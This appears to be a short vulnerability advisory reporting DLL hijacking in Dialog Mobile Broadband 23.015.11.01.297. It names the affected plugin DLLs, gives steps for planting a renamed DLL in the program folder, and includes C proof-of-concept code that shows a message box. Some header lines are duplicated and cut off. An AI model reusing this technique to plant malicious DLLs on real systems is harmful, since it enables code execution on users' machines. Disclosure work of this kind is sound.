Vulnerable software .......................... Dialog Mobile Broadband 23.015.11.01.297
Vulnerability type .............................. DLL hijacking vulnerability
Affected DL Vulnerable software .......................... Dialog Mobile Broadband 23.015.11.01.297
Vulnerability type .............................. DLL hijacking vulnerability
Affected DLL's.................................... CallSrvPlugin.dll , GpsSrvPlugin.dll , CallAppPlugin.dll , CallLogSrvPlugin.dll , WLANPlugin.dll , CallAppPlugin,MDInterface.dll
Vendor url .https://www.dialog.lk
Author..Himash
Product descriptionDialog mobile broad band is a dongle software (3g modem)for accessing internet.
It comes with dialog dongle pre installed.
1. Compile dynamic link library (DLL)
2. Rename to CallSrvPlugin.dll
2. Copy CallSrvPlugin to "C:Program Files (x86)Dialog Mobile Broadband"
3. Launch Dialog Mobile Broadband
4. MessageBox executes that verifies the dll hijacking is successful.
Proof of concept Exploit
#include <windows.h>
int dll_hijack()
{
MessageBox(0, "found DLL hijacking vulnerability in dialog mobile broadband by himash", "DLL Message", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
Dialog Mobile Broadband 23.015.11.01.297 DLL Hijacking
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 403